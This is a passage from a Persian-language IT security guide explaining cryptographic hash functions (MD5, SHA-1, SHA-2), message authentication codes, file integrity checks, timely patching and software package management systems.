‫ﺍﺯ ﻫﺮﺩﻭﻱ ‪ MD5‬ﻭ ‪ SHA-1‬ﺩﺭ ﻓﻨﺎﻭﺭﻱ ‪ SSL‬ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ MD5 .‬ﻧﻴﺰ ﻳﻚ ﺧﻼﺻﻪ ‪ ۱۲۸‬ﺑﻴﺘﻲ‬
‫ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪SHA‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ‪ hash‬ﺍﻳﻤﻦ‪ ،١٠٥‬ﻣﺮﺗﺒﻂ ﺑﺎ ‪ MD4‬ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻫﻤـﺮﺍﻩ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻣﺆﺳـﺴﺔ ﻣﻠـﻲ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻭ‬
‫ﻓﻨﺎﻭﺭﻱ )‪ (NIST's DSS‬ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻣﺪﺕ ﻛﻮﺗﺎﻫﻲ ﺑﻌﺪ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ‪ NIST ،SHA‬ﺍﻋﻼﻡ ﻛﺮﺩ ﻛﻪ ‪ SHA‬ﺑﺪﻭﻥ ﻳﻚ ﺗﻐﻴﻴﺮ ﻛﻮﭼﻚ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺖ‪ SHA .‬ﻳﻚ ﺧﻼﺻﺔ ‪ ۱۶۰‬ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪SHA-1‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ "‪ hash‬ﺍﻳﻤﻦ ﺍﺻﻼﺡ ﺷﺪﻩ" ﻧﺴﺒﺖ ﺑﻪ ‪ SHA‬ﻛﻤﻲ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﺩﺍﻧﺴﺘﻪ ﻧﻴﺴﺖ ﻛﻪ ﺁﻳﺎ ﺍﻳﻦ ﺗﻐﻴﻴـﺮﺍﺕ ‪SHA-1‬‬
‫ﺭﺍ ﻧﺴﺒﺖ ﺑﻪ ‪ SHA‬ﺍﻳﻤﻦﺗﺮ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ‪ ،‬ﺍﻣﺎ ﻋﺪﺓ ﺯﻳﺎﺩﻱ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﭼﻨﻴﻦ ﻣﻲﻛﻨﺪ‪ SHA-1 .‬ﻫﻢ ﻳﻚ ﺧﻼﺻﺔ ‪ ۱۶۰‬ﺑﻴﺘـﻲ ﺗﻮﻟﻴـﺪ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬
‫‪103 Collision‬‬
‫‪104 Message Digest #2‬‬
‫‪105 Secure Hash Algorithm‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٢٩٩‬‬
‫‪SHA-512 ،SHA-384 ،SHA-256‬‬
‫ﺗﻮﺍﺑﻊ ‪ ،۳۸۴ ،۲۵۶ hash‬ﻭ ‪ ۵۱۲‬ﺑﻴﺘﻲ ﺑﺘﺮﺗﻴﺐ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ ،۱۹۲ ،۲۵۶‬ﻭ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺗﻮﺍﺑﻊ ﺗﻮﺳﻂ ‪ NIST‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺟﻬﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺸﺮﻓﺘﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺷﺪﻧﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺗﻮﺍﺑﻊ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺳﻨﺘﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺑﻠﻮﻛﻲ ﻣﺜﻞ ‪ DES‬ﺑﻌﻨﻮﺍﻥ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴـﺎﻡ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺎﺑﻊ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻌﻨﻮﺍﻥ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴـﺎﻡ ﻛـﺎﻓﻲ ﺍﺳـﺖ ﺗـﺎﺑﻊ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺩﺭ ﺣﺎﻟـﺖ ﺭﻣـﺰﻱﺳـﺎﺯﻱ‬
‫ﺑﺎﺯﺧﻮﺭ‪ ١٠٦‬ﺍﺟﺮﺍ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻛﻠﻴﺪ‪ ،‬ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰﻱ ﻛﻪ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﻭ ﻣﺨﺼﻮﺹ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩ ﺍﺳﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﺋﻴـﺪ‪ .‬ﺗﻤـﺎﻡ‬
‫ﻓﺎﻳﻞ ﻭﺭﻭﺩﻱ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺁﺧﺮﻳﻦ ﺑﻠﻮﻙ ﺩﺍﺩﻩ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ‪ ،‬ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺳﺖ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ‪hash‬ﻫﺎﻱ‬
‫ﻋﺎﻟﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﻭﻟﻲ ﺑﺴﻴﺎﺭ ﻛﻨﺪﺗﺮ ﺍﺯ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺳﺎﺑﻖﺍﻟﺬﻛﺮ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﺑﺰﺍﺭ ﻗﻮﻱ ﺑﺮﺍﻱ ﺁﺷﻜﺎﺭﺳﺎﺯﻱ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻚ ﺩﺭ ﻓﺎﻳﻠﻬﺎ ﻳﺎ ﭘﻴﺎﻣﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺑـﺰﺭﮒ ﻫـﺴﺘﻨﺪ‪ .‬ﺑـﺮﺍﻱ ﭘﻴﺎﻣﺘـﺎﻥ ﻛـﺪ‬
‫‪ MD5‬ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺑﻪ ﻛﻨﺎﺭﻱ ﺑﮕﺬﺍﺭﻳﺪ؛ ﺑﻌﺪ ﺍﺯ ﻣﺪﺗﻲ ﺍﮔﺮ ﻓﻜﺮ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻓﺎﻳﻞ )ﻋﻤﺪﹰﺍ ﻳﺎ ﺳﻬﻮﹰﺍ( ﺗﻐﻴﻴـﺮ ﻳﺎﻓﺘـﻪ ﻛـﺎﻓﻲ ﺍﺳـﺖ ﻛـﺪ‬
‫‪ MD5‬ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ ﻭ ﺑﺎ ﺁﻥ ‪ MD5‬ﻛﻪ ﺑﺎﺭ ﺍﻭﻝ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻳﺪ ﻣﻘﺎﻳﺴﻪ ﻧﻤﺎﺋﻴﺪ‪ .‬ﺍﮔﺮ ﺑﺎ ﻫﻢ ﻣﻄﺎﺑﻘﺖ ﻛﺮﺩﻧﺪ‪ ،‬ﺑـﺎ ﺍﻃﻤﻴﻨـﺎﻥ ﺯﻳـﺎﺩ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻓﺮﺽ ﺭﺍ ﺑﺮﺁﻥ ﺑﮕﺬﺍﺭﻳﺪ ﻛﻪ ﻓﺎﻳﻞ ﺗﻐﻴﻴﺮ ﻧﻴﺎﻓﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺪﻟﻴﻞ ﻭﻳﮋﮔﻴﻬﺎﻳﺸﺎﻥ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻣﺮﻭﺯﻱ ﻧﻴﺰ ﻫﺴﺘﻨﺪ‪ .‬ﺧﻼﺻﻪﭘﻴﺎﻣﻬـﺎ ﻣﺒﻨـﺎﻱ‬
‫ﺍﻏﻠﺐ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻣﺮﻭﺯﻱ ﺗﺼﺮﻳﺢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺠﺎﻱ ﻛـﻞ ﺳـﻨﺪ ﻛـﺎﻓﻲ‬
‫ﺍﺳﺖ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺳﻨﺪ ﺍﻣﻀﺎ ﺷﻮﺩ‪.‬‬
‫ﺧﻼﺻﻪﭘﻴﺎﻣﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺮﺍﻱ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﭘﻴﺎﻡ ﻛـﻪ ﻳـﻚ ﺭﻣـﺰ ﻣـﺸﺘﺮﻙ ﺑـﻴﻦ ﺩﻭ ﻃـﺮﻑ ﺍﺭﺗﺒـﺎﻁ‬
‫ﻣﻲﺑﺎﺷﻨﺪ ﻭ ﺗﺄﻳﻴﺪ ﭘﻴﺎﻡ ﺭﺍ ﺛﺎﺑﺖ ﻣﻲﻛﻨﻨﺪ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪MAC .‬ﻫﺎ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﭘﻴﺎﻣﻲ ﻛﻪ ﺑﺎﻳﺪ ﺗﺄﻳﻴﺪ ﺻﺤﺖ ﺷﻮﺩ ﺿﻤﻴﻤﻪ ﻣﻲﺷـﻮﻧﺪ )‪ RFC‬ﺷـﻤﺎﺭﺓ‬
‫‪ ٢١٠٤‬ﭼﮕﻮﻧﮕﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺭﻫﻢﺭﻳﺰﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺻﺤﺖ ﭘﻴﺎﻡ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ(‪MAC .‬ﻫﺎﺋﻲ ﻛﻪ ﺑﺮ ﭘﺎﻳـﺔ ﺧﻼﺻـﻪﭘﻴﺎﻣﻬـﺎ ﻫـﺴﺘﻨﺪ ﺍﻣﻨﻴـﺖ‬
‫ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﻧﺪ‪.‬‬
‫ﺣﻔﻆ ﻳﻜﭙﺎﺭﭼﮕﻲ‬
‫ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ‬
‫ﺍﺯ ﻟﺤﻈﻪﺍﻱ ﻛﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ‪ ١٠٧‬ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﻣـﻲﺷـﻮﺩ‪ ،‬ﺩﺭ ﻣﻌـﺮﺽ ﺗﻼﺷـﻬﺎﻱ ﻛـﺸﻒ ﻭ ﺩﺳـﺘﻴﺎﺑﻲ ﺍﻓـﺮﺍﺩ‬
‫ﻧﺎﺧﻮﺍﻧﺪﺓ ﺑﻴﺮﻭﻧﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻣﻬﺎﺟﻤﻴﻦ‪ ،‬ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺟﺪﻳﺪ ﺭﺍ ﺑﺎ ﺳﺮﻋﺘﻲ ﺷﮕﻔﺖﺁﻭﺭ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺟﺰﺋﻴﺎﺕ ﮔﺰﺍﺭﺵ ﺷﺪﻩ ﺩﺭ ﺍﻳـﻦ‬
‫ﻣﻮﺭﺩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺑﻲ ﻛﻪ ﺗﻮﺳﻂ ﻃﺮﺡ ‪ Honeynet‬ﺣﻤﺎﻳﺖ ﻣﻲﺷﻮﺩ ‪ - http://project.honeynet.org/ -‬ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﺩﺭ‬
‫ﻳﻚ ﻣﻮﺭﺩ‪ ،‬ﻳﻚ ﺳﻴﺴﺘﻢ ‪ Honeynet‬ﻛﻪ ﺟﺪﻳﺪﹰﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﺗﻨﻬﺎ ‪ ۱۵‬ﺩﻗﻴﻘﻪ ﺑﻌﺪ ﺍﺯ ﺁﻧﻜﻪ ﺩﺭ ﺷﺒﻜﻪ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪ ﺑـﺎ ﻣﻮﻓﻘﻴـﺖ‬
‫ﻫﺪﻑ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪ .‬ﻟﺬﺍ ﻻﺯﻡ ﺍﺳﺖ ﻫﺮ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﻭﺍﺭﺩ ﺷﺒﻜﻪ ﻣﻲﺷﻮﺩ ‪ -‬ﻫـﻢ ﻗﺒـﻞ ﺍﺯ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺷـﺒﻜﻪ ﻭ ﻫـﻢ ﺑﻌـﺪ ﺍﺯ ﺁﻥ ‪ -‬ﺑـﺎ‬
‫ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﻮﺩ‪.‬‬
‫‪106 Cipher Feedback Mode‬‬
‫‪107 Workstation‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺣﻔﻆ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻛﻠﻲ ﻭ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ .‬ﺷـﻤﺎ‬
‫ﺑﺎﻳﺪ ﺍﺯ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‪ ،‬ﻭ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫﺎﻳﺘـﺎﻥ ﺍﻃﻤﻴﻨـﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ‪ .‬ﺩﺭﺧـﺼﻮﺹ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‪ ،‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻧﻪﺗﻨﻬﺎ ﻣﺴﺘﻠﺰﻡ ﻧﻈﺎﺭﺕ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮﺍﺕ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺍﺳﺖ‪ ،‬ﺑﻠﻜﻪ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺍﻋﻤﺎﻝ ﻭﺻﻠﻪﻫﺎ ﻭ ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻳﻤﻨﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪٣٠٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﻚ ﺩﺳﺘﻪ ﺍﺑﺰﺍﺭﻫﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺍﺳﺖ ﺑﺮﺍﻱ ﺣﻔﻆ ﺭﺩﻳﺎﺑﻲ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﻛﺪﺍﻡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻧﺼﺐ ﺷﺪﻩ ﻫﺴﺘﻨﺪ‪،‬‬
‫ﻭ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﻫﻴﭻ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺤﻠﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﻥ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﻳﺎ ﻧﻪ‪ .‬ﺑﺪﻭﻥ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺍﻣﻜﺎﻥ ﺍﻳﻨﻜﻪ ﺑﺪﺍﻧﻴﻢ ﺁﻳﺎ‬
‫ﻳﻚ ﺟﺰﺀ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﺭﻭﺯ ﺷﻮﺩ ﻳﺎ ﺍﻳﻨﻜﻪ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺤﻠﻲ ﺻﻮﺭﺕ ﭘﺬﻳﺮﻓﺘﻪ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﭘﺲ ﺍﺯ ﺑﻪ ﺭﻭﺯ ﺩﺭ ﺁﻣـﺪﻥ ﻣﺤﻔـﻮﻅ‬
‫ﺑﻤﺎﻧﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺍﻣﻨﻴﺘﻲ ﺣﻴـﺎﺗﻲ ﻭ ﺑـﺮﺍﻱ ﺍﺭﺗﻘﺎﻫـﺎﻱ‬
‫ﻏﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻔﻴﺪ ﺍﺳﺖ‪.‬‬
‫ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows NT‬ﻧﻮﻋﻲ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑـﺮﺍﻱ ﺍﺟـﺰﺍﻱ ﻣﺮﻛـﺰﻱ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﺎ ﺁﻧﻬﺎ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻣﺘـﺪﺍﻭﻟﺘﺮﻳﻦ ﺭﻭﺵ‪ ،‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ "ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﻣﺪﻳﺮﻳﺘﻲ" ‪ -‬ﻓﺎﻳﻠﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭ ﻗﺎﺑﻞ ﺍﺟﺮﺍﻱ ﺍﺯ ﭘﻴﺶ ﺗﺮﺟﻤﻪﺷﺪﻩ ‪ -‬ﺍﺳﺖ ﻛﻪ ﺧﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺑﺮﺭﺳﻲ ﺳﻴﺴﺘﻢ ﻣﺘﻮﺟﻪ ﺷﻮﻧﺪ ﻛﺪﺍﻣﻴﻚ ﺍﺯ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺼﺐ ﺷﻮﻧﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‬
‫ﻼ ﺗﺮﺟﻤﻪ ﺷﺪﻩﺍﻧـﺪ‪ ،‬ﻫﻤـﺮﺍﻩ ﻫﺮﮔﻮﻧـﻪ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﻓﺎﻳﻠﻲ ﺷﺎﻣﻞ ﻳﻚ ﺩﺳﺘﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺍﺳﺖ ﻛﻪ ﻗﺒ ﹰ‬
‫ﻳﻚ ﻓﺎﻳﻞ ﻧﻮﻋ ﹺ‬
‫ﻣﺮﺗﺒﻂ ﺍﺯ ﻗﺒﻴﻞ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﭘﻴﺶﻓﺮﺽ‪ ،‬ﻭ ﻣﺴﺘﻨﺪﺍﺕ‪ .‬ﺗﺤﺖ ﺍﻏﻠﺐ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺍﺭﺍﻱ‬
‫ﻓﺮﺍﺩﺍﺩﻩﻫﺎﻳﻲ‪ ١٠٨‬ﻣﺎﻧﻨﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻧﻴﺰ ﻫﺴﺖ‪:‬‬
‫• ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﮕﺎﺭﺵ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺭ ﺁﻥ ﺑﺴﺘﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؛‬
‫• ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﺳﺎﺯﮔﺎﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳﺎ ﻣﻌﻤﺎﺭﻱﻫﺎﻱ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ؛‬
‫• ﻓﻬﺮﺳﺖ ﺳﺎﻳﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﻳﻦ ﺑﺴﺘﻪ ﺁﻧﻬﺎ ﺭﺍ ﻻﺯﻡ ﺩﺍﺭﺩ؛‬
‫• ﻓﻬﺮﺳﺖ ﺳﺎﻳﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﻳﻦ ﺑﺴﺘﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﺗﻌﺎﺭﺽ ﺍﺳﺖ؛‬
‫• ﻓﻬﺮﺳﺖ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﻓﺎﻳﻠﻬﺎ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻫﺴﺘﻨﺪ )ﻳﺎ ﻓﻬﺮﺳﺖ ﻓﺎﻳﻠﻬﺎﻳﻲ ﮐﻪ ﮐﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺗﻐﻴﻴﺮ ﺩﻫﺪ(؛ ﻭ‬
‫• ﻓﺮﺍﻣﻴﻨﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﻗﺒﻞ‪ ،‬ﺩﺭ ﺧﻼﻝ‪ ،‬ﻭ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺴﺘﻪ ﺍﺟﺮﺍ ﺷﻮﻧﺪ‪.‬‬
